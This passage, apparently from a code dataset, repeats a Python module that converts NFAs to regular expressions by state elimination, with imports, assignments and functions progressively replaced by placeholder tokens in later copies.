qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\nDEBUG = False\nLAMBDA = u'λ'\nPHI = u'Ø'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in 